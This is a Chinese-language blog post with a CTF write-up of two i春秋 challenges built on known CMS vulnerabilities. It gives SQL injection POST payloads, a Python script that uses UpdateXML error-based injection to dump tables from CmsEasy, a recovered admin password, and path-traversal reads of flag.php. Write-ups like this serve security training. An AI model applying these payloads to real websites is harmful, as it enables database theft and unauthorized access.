<!DOCTYPE HTML>
<html class="no-js" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
    <!--[if lte IE 9]>
<meta http-equiv="refresh" content="0;url=http://yoursite.com/warn.html">
<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-DNS-Prefetch-Control" content="on">
<link rel="dns-prefetch" href="http://yoursite.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="prefetch" href="http://yoursite.com">
<link rel="prefetch" href="//www.google-analytics.com">


<link rel="prerender" href="http://yoursite.com">

<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">
<meta http-equiv="mobile-agent" content="format=html5; url=http://yoursite.com">
<meta name="author" content="John Doe">
<link rel="stylesheet" href="/css/JSimple.css">

<link rel="shortcut icon" href="/images/favicon.png">


<title>i春秋 cms - Hexo</title>

<meta name="keywords" content>

<meta name="description " content>

    <script type="text/x-mathjax-config">
        MathJax.Hub.Config({
            tex2jax: {
                inlineMath: [ ['$','$'], ["\\(","\\)"] ],
                processEscapes: true
            }
        });
    </script>


    

    

</head>
<body>
<div id="nav">
    <nav class="nav-menu">
        <a class="site-name current" href="/" title="说">说</a>
        <a class="site-index current" href="/"><i class="fa fa-home"></i><span>首页</span></a>
        <a href="/archives" title="归档"><i class="fa fa-archives"></i><span>归档</span></a>
        <a href="/tags" title="标签"><i class="fa fa-tags"></i><span>标签</span></a>
        <!-- custom single page of menus -->
        
        
        <a href="/help" title="帮助">
            <i class="fa fa-question-circle"></i>
            <span>帮助</span>
        </a>
        
    </nav>
</div>

<div class="nav-user">
    <a class="btn-search" href="#"><i class="fa fa-search"></i></a>
    <a class="btn-read-mode" href="#"><i class="fa fa-sun-o"></i></a>
    <a class="btn-sns-qr" href="javascript:"><i class="fa fa-telegram"></i></a>
</div>

<div id="wrapper" class="clearfix">
    <div id="body">
        <div class="main" id="main">
            <div id="cover">
    <div class="cover-img"></div>
    <div class="cover-info">
        
        <h1 class="cover-siteName">说IT</h1>
        <h3 class="cover-siteTitle">用代码摇滚这个世界</h3>
        <p class="cover-siteDesc">一个关注技术与人文的IT博客</p>
        <div class="cover-sns">
            
    &nbsp;&nbsp;<div class="btn btn-telegram">
        <a href="http://t.me/kunyintang" target="_blank" title="telegram" ref="friend">
            <i class="fa fa-telegram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-instagram">
        <a href="https://www.instagram.com/mtangsir/" target="_blank" title="instagram" ref="friend">
            <i class="fa fa-instagram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-twitter">
        <a href="https://twitter.com/tangkunyin" target="_blank" title="twitter" ref="friend">
            <i class="fa fa-twitter"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-github">
        <a href="https://github.com/tangkunyin" target="_blank" title="github" ref="friend">
            <i class="fa fa-github"></i>
        </a>
    </div>


        </div>
    </div>
</div>

            <div class="page-title">
    <ul>
        <li><a href="/">最近</a></li>
        
        
        
        <li class="page-search">
    <form id="search" class="search-form">
        <input type="text" readonly="readonly" id="local-search-input-tip" placeholder="读物检索~">
        <button type="button" disabled="disabled" class="search-form-submit"><i class="fa fa-search"></i></button>
    </form>
</li>

    </ul>
</div>
<div class="main-inner">
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
        <div class="post-header">
            <div class="post-author clearfix">
                <a class="avatar fleft" href="https://shuoit.net" target="_blank">
                    <img width="48" src="/images/favicon.png" alt="avatar">
                </a>
                <p><span class="label">作者</span>
                    <a href="https://shuoit.net" target="_blank">纠结伦</a>
                    <span title="最后编辑于&nbsp;2019-03-30">2019-03-30</span>
                </p>
                <p>一个搬🧱的劳斯基😁️️</p>
            </div>
            <h2 class="post-title">i春秋 CMS</h2>
            <div class="post-meta">
                本文共计2500个字 |
                您是第&nbsp;<span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>位看到它们的小伙伴
            </div>
        </div>
        <div class="post-content markdown-body">
            <h1 id="再见CMS"><a href="#再见CMS" class="headerlink" title="再见CMS"></a>再见CMS</h1><p> i春秋上边有两个题目都是关于已知漏洞，然后需要自己去查找，今天将它们总结到一起，做一个小总结。<br> 拿到一个博客网站:</p>
<ol>
<li>要判断出cms类型。</li>
<li>查询该cms曾经出现的漏洞。</li>
<li>利用这些漏洞拿到flag。<br>第一步：<br><a href="https://blog.csdn.net/qq1124794084/article/details/79218596" target="_blank" rel="noopener">https://blog.csdn.net/qq1124794084/article/details/79218596</a><br>到网站最后，在度娘上搜索以下内容：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-35069655.PNG" alt><br>找到了这个：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-bf6442b1.PNG" alt><br>第二步：<br>找到了相关的漏洞：<br><a href="https://www.2cto.com/article/201501/365742.html" target="_blank" rel="noopener">https://www.2cto.com/article/201501/365742.html</a><br>第三步：<br>根据第二步的内容，进行爆破：<br>根据漏洞构造这样一个注入语句，判断能否注入：<br><a href="http://64475e701bee42ceba15a967b3737b7ebd9a2eace0794caf.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2" target="_blank" rel="noopener">http://64475e701bee42ceba15a967b3737b7ebd9a2eace0794caf.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2</a><br>post数据：<br>truename=xxxx%0000&amp;Limitword[000]<a href="mailto:=&amp;email=dc339@qq.com" target="_blank" rel="noopener">=&amp;email=dc339@qq.com</a>&amp;provinceid=,address=(select version()) where uid=3 %23<br>简单的说一下这个注入，url是一个修改个人信息的链接，post里面是我们要修改的内容，变量里面的%00经过转义会变成\0,那么$truename=xxxx%0000就会变成 $truename = xxxx\000 ，而关联数组变量$Limitword则会对$truename这些变量进行字符串替换，把符合key值的字符替换为value。我们提交的post里面$Limitword则有 000=&gt;”,这样一对kay-value值，所以$truename则会被替换为 $truename = xxxx\，且字符串里面的\是没有经过转义的。我们测试以下注入能否进行。<br><code>truename</code>=’xxxx\’,<code>provinceid</code>=’ ‘,<code>cityid</code>=” WHERE username=’abc’ ，在xxxx前面有一个单引号，但是xxxx后面的那个单引号被加了\，表示转义，所以xxxx后面的单引号便不再具有闭合单引号的功能。所以<code>truename</code>=’xxxx\’,<code>provinceid</code>=’ 成为了一个完整单引号闭合的变量。那么，我们就可以在post里的provinceid字段里写入注入语句。<br>1.版本号：</li>
</ol>
<p><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-0f64f79f.PNG" alt></p>
<p><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-a4fed32a.PNG" alt><br>2.库<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-d5369fb4.PNG" alt></p>
<p><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-a6a5d81f.PNG" alt><br>3.表<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-1d130eb2.PNG" alt></p>
<p><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-458b5e3b.PNG" alt><br>弄到最后没有flag，尴尬。。。。。<br>发现页面上方有一个网址，默默的堵了一把，看看有没有flag.php，有的大佬用源码泄露工具扫出来了，反正我用御剑和源码泄露工具均失败，索性拼一把。。。<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-1ead62e3.PNG" alt></p>
<p><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-a066f7c0.PNG" alt><br>load_file函数里面那一串十六进制数字代表/var/www/html/flag.php<br>成功！！！！！！！！</p>
<h1 id="YeserCMS"><a href="#YeserCMS" class="headerlink" title="YeserCMS"></a>YeserCMS</h1><p>这道题和上边的题答题思路一样，不过我找了版本号之类的，并没有找到相关的漏洞，后来看了大佬的wp，才知道原来是用户评论的地方有漏洞：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-31ad5f9e.PNG" alt><br>这是cmseasy漏洞，相关内容在以下链接中：<br><a href="http://www.anquan.us/static/bugs/wooyun-2015-0137013.html" target="_blank" rel="noopener">http://www.anquan.us/static/bugs/wooyun-2015-0137013.html</a><br>相关函数：<br><a href="https://www.jb51.net/article/104699.htm" target="_blank" rel="noopener">https://www.jb51.net/article/104699.htm</a><br>stristr() 函数：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-079eeae2.PNG" alt><br>addslashes() 函数：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-db0ec4c2.PNG" alt><br>parse_str()函数：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-18572425.PNG" alt><br>parse_str()的作用是解析字符串并且把字符串注册成变量，第二个参数$arr是一个数组，parse_str()之前会先urldecode,也就是会二次url解码，实现单引号逃逸。<br>这个漏洞主要是通过这次decode，实现了单引号的溢出，可以查看sql注入代码。<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-d507b35a.PNG" alt><br>一次解码：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-19ba8f10.PNG" alt><br>可以清晰的看出%27单引号的出现，在解码一次，便成功实现单引号的出现。<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-8d239b28.PNG" alt><br>以上是第这个本身存在的漏洞。。<br>接下来看题：<br>直接复制代码是错的。。。。这个题不需要编码两次，坑人啊。。。。。。。。<br>接下来一步步爆出数据：<br>数据库：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-2f6a5dec.PNG" alt></p>
<p><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-30b058ed.PNG" alt></p>
<p>数据表：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-818cbee8.PNG" alt><br>这个有点长。。。。。。。。。。。。<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-67f3da0e.PNG" alt><br>第二个:<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-8c637f19.PNG" alt><br>不行了。。找了个大佬的脚本。。。。<br>import requests<br>url = ‘<a href="http://4ca855984438463fb04a91cd5e5bf928de24f893e19d4ad2.changame.ichunqiu.com/celive/live/header.php&#39;" target="_blank" rel="noopener">http://4ca855984438463fb04a91cd5e5bf928de24f893e19d4ad2.changame.ichunqiu.com/celive/live/header.php&#39;</a><br>for i in range(1,999,31):<br>    postdata = {<br>    ‘xajax’:’Postdata’,<br>    ‘xajaxargs[0]’:”<xjxquery><q>detail=xxxxxx’,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),%s,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)– </q></xjxquery>“ %str(i)<br>}<br>    r = requests.post(url,data=postdata)<br>    print(r.content[22:53])<br>结果吓了我一跳！！！！！！！<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-a0a1d9df.PNG" alt><br>应该是user吧。。。。。。。。<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-cb8f3fe4.PNG" alt></p>
<p><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-8cb5d99f.PNG" alt><br>出来后，md5解码：<br>admin|Yeser231<br>登录后，进入后台，又遇到知识盲区，get技能阶段。。。。。。。。<br>后台是直接读取了这些文件，那么可以通过修改request里的参数就可以直接读取falg.php里的信息了。<br>把id参数分别尝试 falg.php , ../flag.php , ../../flag.php ,最后得到flag<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-e6a3be1d.PNG" alt><br>结果：<br><img src="/2019/03/30/i春秋-CMS/i春秋-CMS-baea5b26.PNG" alt><br>i春秋再次不识别我的答案。。。。。。。<br>结束。。。。<br>最后，放一个UpdateXml() MYSQL显错注入:<br><a href="https://www.cnblogs.com/MiWhite/p/6228491.html" target="_blank" rel="noopener">https://www.cnblogs.com/MiWhite/p/6228491.html</a></p>

        </div>
        <div class="post-tool">
            <a class="btn-thumbs-up" href="javascript:void(0);" data-cid="52" title="95">
                <i class="fa fa-thumbs-up" aria-hidden="true"></i> 打赏
            </a>
        </div>
        
        <div class="post-tags">标签：
            
            <a href="/tags/ctf-web/">ctf web</a>
            
        </div>
        
    </article>
    
    <p style="text-align: center">本文代表个人观点，内容仅供参考。若有不恰当之处，望不吝赐教！</p>
    
    

    

</div>
<script src="/js/busuanzi.pure.mini.js"></script>


        </div><!-- end #main-->
    </div><!-- end #body -->
    <footer class="footer">
    <div class="footer-inner" style="text-align: center">
        <p>
            <a href="/about" title="关于">关于</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <!-- 自定义链接 -->
            <a href="/help" title="帮助">帮助</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/links" title="友链">友链</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/sitemap.xml" title="地图">地图</a>
        </p>
        <p>
            本站已建立&nbsp<a href="/timeline" id="siteBuildingTime"></a>&nbsp天，<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="licence">采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议创作</a><br>
            ©2017-<span id="cpYear"></span> 基于&nbsp<a href="http://hexo.io" target="_blank" rel="nofollow">Hexo</a>
            ，主题采用&nbsp&nbsp<a href="https://github.com/tangkunyin/hexo-theme-jsimple" target="_blank" rel="bookmark">JSimple</a>
            ，作者&nbsp<a href="https://shuoit.net" target="_blank" rel="friend">纠结伦</a>
            ，Hosted by <a href="https://pages.github.com/" target="_blank" rel="nofollow">GitHub Pages</a>
        </p>
    </div>
</footer>
<script src="/js/SimpleCore.js"></script>

</div>
<!-- search pop -->
<div class="popup search-popup local-search-popup">
    <div class="local-search-header clearfix">
        <span class="search-icon">
            <i class="fa fa-search"></i>
        </span>
        <span class="popup-btn-close">
            <i class="fa fa-times-circle"></i>
        </span>
        <div class="local-search-input-wrapper">
            <input id="local-search-input" spellcheck="false" type="text" autocomplete="off" placeholder="请输入查询关键词">
        </div>
    </div>
    <div id="local-search-result"></div>
</div>
<div class="fixed-btn">
    <a class="btn-gotop" href="javascript:"> <i class="fa fa-angle-up"></i></a>
</div>
<script>
    $(function () {
        var jsi_config = {
            buildingTime: '01/20/2018',
            current: $('.post-tags').length > 0 ? 'post' : 'archive',
            snsQRCode: '/images/sns-qrcode.png',
            donateImg: '/images/donate-qr.png',
            localSearch: { dbPath: '' },
            readMode: 'day'
        };
        
        SimpleCore.init(jsi_config);
        
    });
</script>
</body>
</html>
